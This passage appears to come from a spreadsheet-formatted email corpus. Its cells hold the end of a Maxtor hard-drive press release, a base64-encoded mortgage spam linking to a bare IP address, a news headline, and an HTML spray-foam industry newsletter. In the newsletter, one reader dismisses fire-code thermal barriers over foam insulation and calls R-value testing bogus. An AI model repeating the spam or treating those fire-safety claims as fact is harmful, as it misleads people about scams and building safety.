 legacy of experience and provide our customers with a family of premium ATA 
 hard drives that can be integrated into a variety of systems for these 
 enterprise applications."
 The MaXLine family includes the 5400-RPM MaXLine II, designed for 
 capacities up to 320 GB and the 7200-RPM MaXLine Plus II, designed for 
 capacities up to 250 GB. At these capacities, MaXLine offers higher storage 
 density than many tape and optical solutions. These drives have also been 
 tested and are projected to meet enterprise reliability requirements, 
 already exceeded by prior drives employing the same robust Maxtor designs, 
 which exceed MTTF of over one million hours. These drives will also carry a 
 three-year warranty.
 The MaXLine II and MaXLine Plus II feature the Maxtor Fast DriveTM 
 UltraATA/133 interface for data transfer speeds up to 133 MB per second. 
 The MaXLine II and MaXLine Plus II will be available with next-generation 
 serial ATA interface for higher performance. At 150 MB per second maximum 
 data transfer rate, serial ATA improves hard drive performance to keep pace 
 with the rapidly increasing performance requirements of data intensive 
 environments and enterprise applications.
 With a point-to-point connection architecture, and rich command set for 
 managing hard drive activity and data flow along the interface, serial ATA 
 advances the performance and efficiency of the drive to system interface. 
 The interface's reduced pin count allows for simpler cabling which in turn 
 allows better airflow within a system and further benefits the user with 
 increased design flexibility and hot plug capability.
 "Maxtor's MaXLine family of drives provide a solution for storing data that 
 has previously been too expensive to keep on disk," said Dave Reinsel, 
 analyst at IDC. "The ATA drives offer a great value, low cost per GB and 
 when integrated into storage systems and file servers offer a compelling 
 cost-effective alternative to tape libraries and optical drives, which have 
 been the traditional solutions used for near-line applications."
 Availability
 Limited qualification units of the parallel ATA versions of Maxtor MaXLine 
 II and MaXLine Plus II are now available; with volume units available in 
 the fourth quarter. Qualification units of the MaXLine II and MaXLine Plus 
 II with serial ATA will be available later this month with volume shipments 
 scheduled to begin in the first quarter of 2003.
 About Maxtor
 Maxtor Corporation (www.maxtor.com) is one of the world's leading suppliers 
 of information storage solutions. The company has an expansive line of 
 storage products for desktop computers, storage systems, high-performance 
 servers and consumer electronics. Maxtor has a reputation as a proven 
 market leader built by consistently providing high-quality products and 
 service and support for its customers. Maxtor and its products can be found 
 at www.maxtor.com or by calling toll-free (800) 2-MAXTOR. Maxtor is traded 
 on the NYSE under the MXO symbol.
 Note: Maxtor, MaXLine and the Maxtor logo are registered trademarks of 
 Maxtor Corporation. Fast Drive is a trademark of Maxtor Corporation. All 
 other trademarks are properties of their respective owners.
 GB means 1 billion bytes. Total accessible capacity varies depending on 
 operating environment.
 This announcement relating to Maxtor may contain forward-looking statements 
 concerning future technology, products incorporating that technology, and 
 Maxtor's execution. These statements are based on current expectations and 
 are subject to risks and uncertainties which could materially affect the 
 company's results, including, but not limited to, market demand for hard 
 disk drives, the company's ability to execute future production ramps and 
 utilize manufacturing assets efficiently, pricing, competition, and the 
 significant uncertainty of market acceptance of new products.  These and 
 other risk factors are contained in documents that the company files with 
 the SEC, including the Form 10-K for fiscal 2001 and its recent 10-Qs.
 Copyright  2001, Maxtor Corporation . Privacy Policy.
 -- 
 ((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: .* Mortgage Approved!*
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D2_37D32C7A.E3536A81
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 WW91ciBtb3J0Z2FnZSBoYXMgYmVlbiBhcHByb3ZlZC4NCg0KTm93IGFwcGx5
 IGZvciBob3cgbXVjaCB5b3UgZ2V0IQ0KDQpodHRwOi8vNjYuMjMxLjEzMy4y
 MDEvRnJlZS8NCg0KDQoNCg0KVG8gYmUgcmVtb3ZlZCBmcm9tIG91ciBtYWls
 aW5nIGNsaWNrIGhlcmUNCg0KaHR0cDovLzY2LjIzMS4xMzMuMjAxL1JlbW92
 ZS8NCjI4NzB4dGlhMi02NjlqZUNqNjk1NHJ2d0M2LTI2OVZ2cWg3MDkyTkts
 Mzg=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: US forces Israel to lift siege of Arafat
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381142,215/
 Date: 2002-09-30T03:05:01+01:00
 *World latest:* Israel pulled its tanks and soldiers out of Yasser Arafat's 
 West Bank headquarters yesterday.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Industry Forum #136
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an HTML email message.  If you see this, your mail client does not support HTML messages.
 ------=_NextPart_QXVROEFEFX
 Content-Type: text/html;charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: x-small; FONT-FAMILY: arial,helvetica,sans-serif" vAlign=top bgColor=white&gt;
 &lt;TABLE class=barlink cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: x-small; FONT-FAMILY: arial,helvetica,sans-serif"&gt;
 &lt;TABLE cellPadding=8 width="100%"&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="FONT-SIZE: x-small; FONT-FAMILY: arial,helvetica,sans-serif"&gt;&lt;BR&gt;&amp;nbsp; 
 &lt;DIV id=message&gt;&lt;XMETA content="en-us" http-equiv="Content-Language" /&gt;&lt;XBODY lang=EN-US vlink="blue" link="blue" bgcolor="yellow" /&gt;
 &lt;DIV class=Section1 style="WIDTH: 900px; HEIGHT: 1704px"&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: blue; FONT-FAMILY: Arial"&gt;The Industry Forum&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
 &lt;TABLE style="WIDTH: 100%; BORDER-COLLAPSE: collapse" cellSpacing=0 cellPadding=0 border=1&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 13%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif" width="13%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;A href="http://www.cpillc.com/prd-cpi-mms.htm"&gt;&lt;IMG height=140 src="http://www.cpillc.com/images/CPI-M2-Front_001030_small.jpg" width=100 border=0&gt;&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 12%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif" width="12%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;FONT size=2&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;Minute Man II&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;FONT size=2&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;160 lbs. light - requires no electricity - under $6000 complete! &lt;B&gt;Now everybody can be a foamer!&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 12%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif" width="12%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/SPAN&gt;&lt;A href="http://www.cpillc.com/prd-flx-frothpak.htm"&gt;&lt;IMG height=51 src="http://www.cpillc.com/images/es-flx-frothpak-tn.jpg" width=96 border=0&gt;&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 22%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;FONT size=2&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;&lt;B&gt;Small, one time project?&lt;BR&gt;&lt;/B&gt;Froth-Pak is the answer! Smallest self-contained out-of-box foam application for repairs and small jobs! Also available: Insta-Stick, Tilebond, RoofPak and more!&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 19%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif"&gt;
 &lt;P class=MsoNormal align=center&gt;&lt;A href="http://www.cpillc.com/form-feedback.htm"&gt;&lt;IMG height=153 src="http://www.cpillc.com/images/Forum-IC-Cover.jpg" width=102 border=0&gt;&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 22%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;Get Your Copy of The Industry Catalog! Most complete reference for our industry!&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; WIDTH: 100%; PADDING-TOP: 0in; FONT-FAMILY: arial,helvetica,sans-serif" width="100%" colSpan=6&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;Click on the picture above to learn more about the equipment!&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD style="BORDER-RIGHT: navy 0.75pt inset; PADDING-RIGHT: 0in; BORDER-TOP: medium none; PADDING-LEFT: 0in; FONT-SIZE: x-small; PADDING-BOTTOM: 0in; BORDER-LEFT: navy 0.75pt inset; WIDTH: 100%; PADDING-TOP: 0in; BORDER-BOTTOM: navy 0.75pt inset; FONT-FAMILY: arial,helvetica,sans-serif" width="100%" colSpan=6&gt;
 &lt;P class=MsoNormal&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P class=MsoNormal&gt;&amp;nbsp;&lt;/P&gt;
 &lt;TABLE style="BORDER-COLLAPSE: collapse" borderColor=#000080 cellSpacing=0 cellPadding=0 width="100%" border=1&gt;
 &lt;TBODY&gt;
 &lt;TR style="HEIGHT: 15.75pt"&gt;
 &lt;TD style="BORDER-RIGHT: navy 0.75pt inset; PADDING-RIGHT: 2.25pt; BORDER-TOP: #000080 0.75pt inset; PADDING-LEFT: 2.25pt; FONT-SIZE: x-small; BACKGROUND: #ffff3c; PADDING-BOTTOM: 2.25pt; BORDER-LEFT: #000080 0.75pt inset; WIDTH: 100%; PADDING-TOP: 2.25pt; BORDER-BOTTOM: navy 0.75pt inset; FONT-FAMILY: arial,helvetica,sans-serif; HEIGHT: 15.75pt" width="100%" colSpan=2&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; COLOR: blue; FONT-FAMILY: Arial"&gt;The Industry Forum Issue #136&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="COLOR: blue; FONT-FAMILY: PlumpMT"&gt;10341&lt;/SPAN&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;&lt;BR&gt;Forum Members&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD style="BORDER-RIGHT: navy 0.75pt inset; PADDING-RIGHT: 2.25pt; BACKGROUND-POSITION: 0% 50%; BORDER-TOP: #000080; PADDING-LEFT: 2.25pt; FONT-SIZE: x-small; BACKGROUND-ATTACHMENT: scroll; PADDING-BOTTOM: 2.25pt; BORDER-LEFT: #000080; PADDING-TOP: 2.25pt; BORDER-BOTTOM: navy 0.75pt inset; BACKGROUND-REPEAT: repeat; FONT-FAMILY: arial, helvetica, sans-serif; HEIGHT: 29.25pt; BACKGROUND-COLOR: #ffff3c" vAlign=top width="82%" rowSpan=16&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-1: Dik M, PA&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;It would be much more useful to the industry, if SPFA would help find a "CODE CONFORMING" fire barrier for attics, crawl spaces etc., than&amp;nbsp; lecture on Fast and Loose applications of code.&amp;nbsp; Something about 30 cents (a BD. FT.) installed, meeting All codes and spray applied. Many companies we talk to have a product that appears to be perfect BUT they haven't spent the money to test over foam. Maybe a small committee could do a evaluation of various products, report results to SPFA, who in turn will "acquire funding" from US.&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-2 William B, Australia&lt;/P&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;we are in Australia but we are finding it hard to locate polyurea sprayers here so that we can start a chapter of the pda do u have any list of Australian contractors /suppliers ????or maybe they can put their hand up and lets us know at &lt;A href="mailto:enviroline@powerup.com.au,"&gt;enviroline@powerup.com.au,&lt;/A&gt;&amp;nbsp;it is&amp;nbsp;for the better&amp;nbsp;of the game that an association is need to inform clients and specifiers of the uses and properties of polyureas and train its own members,also to keep cowboys out that give the industry a bad name&lt;/FONT&gt; &lt;/DIV&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-3 Ed M.&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;I am a writer for aviation magazines and one that I write for is a Test International, a new publication that just launched this month. I need any new processes you might have that would be used on aircraft, particularly commercial aviation.&lt;BR&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-4 John C, Louisiana&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;I have a Foam Cat 2000 Graco machine and a Probler gun with a 01 tip.&amp;nbsp; I use this setup to spray truck bed liners.&amp;nbsp; My question is can I and how do I spray foam insulation using my equipment?&amp;nbsp; And what are the different types of insulation?&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-5 Murph Mahaffey, Glas-Craft&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;I like the new look of the Industry Forum!&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-6 Mark W, South Carolina&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;I'm sick of all this garbage about covering foam with a "thermal Barrier". What the hell do you think foam is? If you are saying that anything that can be FORCED to burn should be covered with a FIREPROOF barrier, then you'd better get busy covering all those trusses and joists and plywood up there that are definitely NOT carrying a class one fire rating. This double standard for foam is coming directly from those who stand to lose business from it. Icynene is DIFFERENT.&amp;nbsp; IT DOESN'T BURN ALONE. IT DOESN'T MELT. IT DOESN'T EMIT PHOSGENE. Does it smoke in a fire situation? Sure, so what?&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&lt;BR&gt;Blaming foam in the attic for a house fire because it forces the foam to eventually burn is about as stupid as blaming foam seat cushions for burning when a gas tank ruptures and burns up a car. Get real, inspectors. You want us to cover up the only thing in the attic assembly that DOESN'T BURN!&lt;BR&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;As for the vaunted R rating system, IT IS TOTALLY BOGUS. The test is designed to make porous insulations APPEAR to perform better than they actually do.&amp;nbsp; Measuring only conduction and ignoring convection and radiant to convective transfer, the test should have been thrown out for the industry lackey it is 20 years ago, along with that obsolete fiberglass&lt;BR&gt;garbage they're still selling everybody.&amp;nbsp; There's a reason they don't make refrigerators, freezers coolers &amp;amp; coffee cups out of fiberglass or cellulose.&amp;nbsp;&amp;nbsp; Think about it.&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-7 Dirk Benthien, Forum Moderator&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;Thank you, Mark and Dik, for your statements above. I also feel that far too often individuals and companies are too complacent and quietly live with rules and regulations without trying to change them&amp;nbsp; -&amp;nbsp; even if everybody knows they do not make sense. We are all experts and representatives of this industry and should speak up and promote change!&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-8 Martin S, Canada&lt;/P&gt;
 &lt;DIV&gt;&lt;STRONG&gt;&lt;FONT face=Arial size=4&gt;Does anyone make a dispensing machine for crumb rubber / urethane blends ?&lt;/FONT&gt;&lt;/STRONG&gt; &lt;/DIV&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-9 Carole L, California re #135-8 Otto V, Germany&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;What are the answers? (Phase-out of 141b)&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-10 Brian D, Canada&lt;/P&gt;
 &lt;DIV&gt;&lt;FONT style="LINE-HEIGHT: 1.35em" face=Arial size=2&gt;&lt;FONT style="LINE-HEIGHT: 1.35em" face="Times New Roman" size=3&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; There has been a lot of talk about ceramic coatings.&amp;nbsp; We are a distributor of such a coating.&amp;nbsp; We have never professed an R-20.&amp;nbsp; Reason = is there isn't an ASTM test available to measure coatings for R-value. We compare standardized insulation to Ceramic coatings via BTU loss calculations.&amp;nbsp; Depending on the criteria we can equal 2 to 3 inches of standard insulation with an aluminum jacket.&amp;nbsp; We have the data and the projects to prove it.&lt;/FONT&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt; &lt;/DIV&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;#136-11 CPI&lt;/P&gt;
 &lt;P class=arial style="MARGIN: 0in 0in 0pt"&gt;We have inquiries from a number of people for used equipment - especially Gusmer H20/35, H2000, H2, GX-7 and Glas-Craft Probler. Please contact 805-552-9128.&lt;BR&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;++++++++++++++++++++++++++++&lt;/P&gt;
 &lt;P&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;End of messages.&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;This Forum welcomes anyone interested in the processing of single- or plural-component materials such as polyurethane, polyurea, coatings, epoxies, and other spray-applied materials.&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;The Industry Forum. A free &lt;SPAN style="COLOR: red"&gt;e&lt;/SPAN&gt;&lt;SPAN style="COLOR: blue"&gt;Service&lt;/SPAN&gt; from&lt;BR&gt;&lt;/SPAN&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;&lt;FONT size=1&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;A href="http://www.cpillc.com/"&gt;&lt;IMG height=48 src="http://www.cpillc.com/images/Forum-CpiLogo.jpg" width=121 border=0&gt;&lt;/A&gt; &amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 30pt"&gt;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30pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;To ask or answer a question, or to contribute anything, simply send an e-mail to &lt;/SPAN&gt;&lt;B&gt;&lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="mailto:forum@cpillc.com" target=_blank&gt;&lt;SP style="TEXT-DECORATION: none" an&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;forum@cpillc.com&lt;/SPAN&gt;&lt;/SP&gt; &lt;/A&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 30pt"&gt;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30pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;
 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;&lt;A href="http://www.cpillc.com/cla-used.htm"&gt;Used &lt;B&gt;Gusmer H20/35&lt;/B&gt; and &lt;B&gt;Probler Gun &lt;/B&gt;for sale!&lt;/A&gt;&lt;BR&gt;805-552-9128&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 7.5pt; FONT-FAMILY: Arial"&gt;Your privacy is protected! Please read the policies and rules at &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/IndustryForum.htm" target=_blank&gt;cpillc.com&lt;/A&gt;.&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;Show your name here! Become a &lt;B&gt;SPONSOR&lt;/B&gt;! Call 805-552-9128 or send an email to &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Stop"&gt;&lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="mailto:info@cpillc.com" target=_blank&gt;CPI.&lt;/A&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 7.5pt; FONT-FAMILY: Arial"&gt;READ THIS AND PREVIOUS FORUM ISSUES ALL ON ONE PAGE. IT WILL ONLY WORK IF YOU ARE CONNECTED TO THE INTERNET! CLICK HERE TO GO TO &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/forumDiscussion.htm" target=_blank&gt;cpillc.com/forumDiscussion. htm&lt;/A&gt;.&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;Visit &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Stop"&gt;CPI, LLC &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;on the web. Click &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/" target=_blank&gt;http://www.cpillc.com/&lt;/A&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Stop"&gt;CPI&lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt; is authorized distributor for all leading manufacturers in this industry including &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/prd-gu.htm" target=_blank&gt;Gusmer&lt;/A&gt;, &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/prd-gc.htm" target=_blank&gt;Glas-Craft&lt;/A&gt;, &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/prd-go.htm" target=_blank&gt;Graco&lt;/A&gt;, Resin Technology, &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/prd-cpi-acc-dynasolve.htm" target=_blank&gt;Dynasolve&lt;/A&gt;.&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;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class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Stop"&gt;CPI&lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;'&lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 7.5pt; FONT-FAMILY: Arial"&gt;s customers enjoy impartial advice, full service, life-long free phone support, training and set-up with all new system at a very fair price!&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 29.25pt"&gt;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29.25pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;Shop our online warehouse 24/7&lt;BR&gt;Most efficient procurement anywhere! &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 7.5pt; FONT-FAMILY: Arial"&gt;&lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/warehouse.htm" target=_blank&gt;www.cpillc.com/warehouse.htm&lt;/A&gt;&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 30pt"&gt;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30pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;A href="http://www.cpillc.com/cla-job-listings.htm"&gt;Job Market&lt;BR&gt;Spray Jobs&lt;/A&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 30pt"&gt;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30pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;&lt;SPAN style="FONT-SIZE: 10pt; COLOR: blue; FONT-FAMILY: Arial"&gt;Did we miss someone? Feel free to submit any number of e-mail addresses of coworkers and friends to be included here. Again, this service is free for all! Help grow our forum!&lt;/SPAN&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 30pt"&gt;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30pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;We're&lt;/SPAN&gt; &lt;SPAN style="FONT-FAMILY: Stop"&gt;CPI&lt;/SPAN&gt;.&lt;BR&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;We make it work!&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR style="HEIGHT: 30pt"&gt;
 &lt;TD style="BORDER-RIGHT: navy 0.75pt inset; PADDING-RIGHT: 2.25pt; BACKGROUND-POSITION: 0% 50%; BORDER-TOP: #000080; PADDING-LEFT: 2.25pt; FONT-SIZE: x-small; BACKGROUND-ATTACHMENT: scroll; PADDING-BOTTOM: 2.25pt; BORDER-LEFT: #000080 0.75pt inset; PADDING-TOP: 2.25pt; BORDER-BOTTOM: navy 0.75pt inset; BACKGROUND-REPEAT: repeat; FONT-FAMILY: arial, helvetica, sans-serif; HEIGHT: 30pt; BACKGROUND-COLOR: #ffff3c" width="17%"&gt;
 &lt;P class=MsoNormal style="TEXT-ALIGN: center" align=center&gt;Call us toll-free&lt;BR&gt;&lt;B&gt;877-CPI-2100&lt;BR&gt;805-552-9128&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
